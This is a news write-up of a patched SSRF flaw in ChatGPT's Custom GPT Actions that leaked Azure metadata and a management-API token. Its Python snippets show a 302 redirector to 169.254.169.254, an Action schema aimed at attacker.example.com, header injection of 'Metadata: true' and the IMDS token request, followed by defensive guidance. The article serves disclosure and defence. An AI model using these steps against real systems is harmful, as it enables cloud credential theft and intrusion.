
ChatGPT Exploited Through SSRF Flaw in Custom GPT Actions

A patched SSRF flaw in ChatGPT’s Custom GPTs exposed how AI features can unintentionally reveal sensitive cloud metadata.

Written by Ken Underhill
Nov 13, 2025

OpenAI has patched a high-severity SSRF flaw in ChatGPT’s Custom GPTs feature after a researcher showed it could expose internal cloud metadata and potentially Azure credentials. 

The issue underscores growing concern that user-controlled URL inputs can reintroduce traditional web vulnerabilities into modern AI platforms.

How Redirects and Headers Enabled the SSRF Exploit

SSRF vulnerabilities occur when applications fetch resources from user-supplied URLs without proper validation, allowing attackers to coerce systems into making unauthorized internal requests.
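
In code, the vulnerable pattern is straightforward. The following sketch (hypothetical, not OpenAI's implementation) shows a server-side handler that fetches whatever URL and headers the user supplies, with redirects enabled:

```python
# Hypothetical example of the vulnerable SSRF pattern -- not OpenAI's code.
# The server fetches whatever URL the caller supplies, with redirects enabled,
# so requests can be steered at internal-only services.
import requests

def test_action(user_supplied_url: str, user_supplied_headers: dict) -> str:
    # No validation of scheme, host, or destination IP: the request may
    # reach internal endpoints such as 169.254.169.254 (cloud metadata).
    resp = requests.get(
        user_supplied_url,
        headers=user_supplied_headers,
        allow_redirects=True,  # redirects let an attacker pivot to internal HTTP
        timeout=5,
    )
    return resp.text
```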

In cloud environments, the stakes are especially high because metadata endpoints often contain instance information and temporary access tokens. 

Abuse of these endpoints can lead to cloud breaches across multiple providers.
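
Azure's Instance Metadata Service (IMDS) is a concrete example: it listens on the link-local address 169.254.169.254 over plain HTTP and returns instance details to any caller inside the VM that sends the required header. A standard, documented query looks like this:

```python
# Standard Azure IMDS query, shown for context. IMDS listens on a link-local
# address reachable only from inside the VM, over plain HTTP, and requires
# the "Metadata: true" header.
import requests

resp = requests.get(
    "http://169.254.169.254/metadata/instance",
    params={"api-version": "2021-02-01"},
    headers={"Metadata": "true"},
    timeout=2,
)
print(resp.json())  # instance name, location, network config, etc.
```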

Custom GPTs, a premium ChatGPT feature, allow users to integrate external APIs using OpenAPI schemas. 

These “Actions” enable GPTs to pull real-time information — such as weather data — via external HTTP requests. 
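
An Action's schema is an ordinary OpenAPI document, and the server URL inside it is the user-controlled value at the heart of this flaw. The sketch below (expressed as a Python dict; the operation, hostnames, and URLs are illustrative) shows the general shape of such a schema:

```python
# Illustrative OpenAPI 3 document for a Custom GPT Action, expressed as a
# Python dict (Actions accept the equivalent JSON/YAML). The server URL is
# attacker-controllable: the platform sends requests to whatever host is here.
action_schema = {
    "openapi": "3.1.0",
    "info": {"title": "Weather lookup", "version": "1.0.0"},
    "servers": [{"url": "https://attacker.example.com"}],  # attacker-chosen host
    "paths": {
        "/weather": {
            "get": {
                "operationId": "getWeather",
                "responses": {"200": {"description": "Current conditions"}},
            }
        }
    },
}
```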

While exploring the interface, the researcher noticed that the system allowed arbitrary API URLs along with configurable authentication headers. 

A built-in “Test” button executed these requests directly from OpenAI’s infrastructure, raising immediate concerns about SSRF exposure.

Initially, an exploit attempt failed because the system required HTTPS URLs while Azure’s Instance Metadata Service (IMDS) uses unencrypted HTTP. 

However, the researcher bypassed the restriction by redirecting an HTTPS endpoint to the IMDS URL using a 302 redirect from an external domain. 
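
A minimal redirector is enough for that step. The sketch below (hypothetical attacker infrastructure, assumed to sit behind a TLS-terminating proxy so it satisfies the HTTPS-only check) answers every request with a 302 pointing at the IMDS address:

```python
# Minimal redirector sketch (hypothetical attacker infrastructure). Served
# behind HTTPS, it passes the platform's HTTPS-only check, then bounces the
# request to Azure IMDS over plain HTTP via a 302 redirect.
from http.server import BaseHTTPRequestHandler, HTTPServer

IMDS_URL = "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

class Redirector(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", IMDS_URL)
        self.end_headers()

if __name__ == "__main__":
    # TLS termination (for the HTTPS requirement) is assumed to happen in
    # front of this server, e.g. via a reverse proxy.
    HTTPServer(("0.0.0.0", 8080), Redirector).serve_forever()
```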

OpenAI’s servers followed the redirect but were still denied access because Azure requires the special header Metadata: true.

How the Researcher Exploited the SSRF Flaw

The breakthrough came when the researcher realized that the Custom GPT interface allowed arbitrary API key headers. 

By naming one “Metadata” and assigning the value “true,” the request successfully injected the necessary header. 

With the correct redirect and header combination, the researcher retrieved IMDS metadata, including a valid OAuth2 token for Azure’s management API.
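
The net effect was equivalent to the following direct call against Azure's documented IMDS identity endpoint, shown here to illustrate what the redirected, header-injected request returned:

```python
# Documented Azure IMDS identity endpoint, shown to illustrate what the
# redirected, header-injected request returned. From inside the VM, this
# yields an OAuth2 access token for the assigned managed identity.
import requests

resp = requests.get(
    "http://169.254.169.254/metadata/identity/oauth2/token",
    params={
        "api-version": "2018-02-01",
        "resource": "https://management.azure.com/",  # Azure management API
    },
    headers={"Metadata": "true"},  # the header the researcher smuggled in
    timeout=2,
)
token = resp.json()["access_token"]
```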

This token, issued automatically for the managed identity assigned to the compute environment, provided access to sensitive cloud resources. 

The exposed metadata included privileged Azure tokens capable of interacting with OpenAI’s cloud footprint. 

While the researcher noted that this was not the most severe flaw they had discovered, the potential for lateral movement and cloud resource enumeration made the issue highly dangerous.

Hardening AI Platforms Against SSRF Threats

Although OpenAI has patched this SSRF vulnerability, organizations should still implement additional safeguards to protect against similar risks, including:

  • Enforce strict allowlists for outbound connections: Restrict server-side traffic so applications can communicate only with approved external services (see the validation sketch after this list).
  • Block cloud metadata endpoints by default: Disable IMDS access where possible, or require IMDSv2/authorized requests to reduce accidental exposure.
  • Use network egress controls: Implement firewall rules and virtual network security groups to stop unintended internal or external requests.
  • Apply zero-trust validation for AI-driven requests: Treat all AI-generated or AI-triggered network activity as untrusted until fully verified.
  • Implement strong identity and access management (IAM) boundaries: Limit privileges attached to cloud compute roles to reduce the blast radius of compromised tokens.
  • Monitor for anomalous outbound traffic: Use behavioral analytics to detect unusual internal metadata calls, redirect chains, or repeated failed access attempts.
  • Review third-party integrations in AI workflows: Ensure API schemas, user-provided URLs, and custom AI actions are sandboxed and validated.
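
As a concrete illustration of the first two items, the sketch below (illustrative only; the allowlist and hostnames are hypothetical) validates an outbound URL against an allowlist and refuses destinations that resolve to link-local, private, or loopback addresses:

```python
# Minimal egress-validation sketch (illustrative, not a complete defense):
# resolve the destination, require an allowlisted host, and refuse
# link-local/private addresses such as the 169.254.169.254 metadata service.
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_HOSTS = {"api.weather.example.com"}  # hypothetical allowlist

def is_safe_url(url: str) -> bool:
    parsed = urlparse(url)
    if parsed.scheme != "https" or parsed.hostname not in ALLOWED_HOSTS:
        return False
    # Resolve and check every address; DNS may return several records.
    for info in socket.getaddrinfo(parsed.hostname, parsed.port or 443):
        ip = ipaddress.ip_address(info[4][0])
        if ip.is_link_local or ip.is_private or ip.is_loopback:
            return False
    return True

# Note: this check must also be re-applied on every redirect hop, since the
# ChatGPT exploit pivoted through a 302 from an allowed HTTPS host.
```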

As AI systems continue to integrate more deeply into critical business workflows, securing their network behavior becomes essential to maintaining trust and resilience.

The discovery of this SSRF flaw demonstrates how traditional web security issues can resurface in unexpected ways as AI platforms grow more complex and interconnected. 

While OpenAI responded quickly with a patch, the incident underscores the importance of layered security. 

Organizations should reinforce identity-driven controls and implement continuous verification using zero-trust solutions.
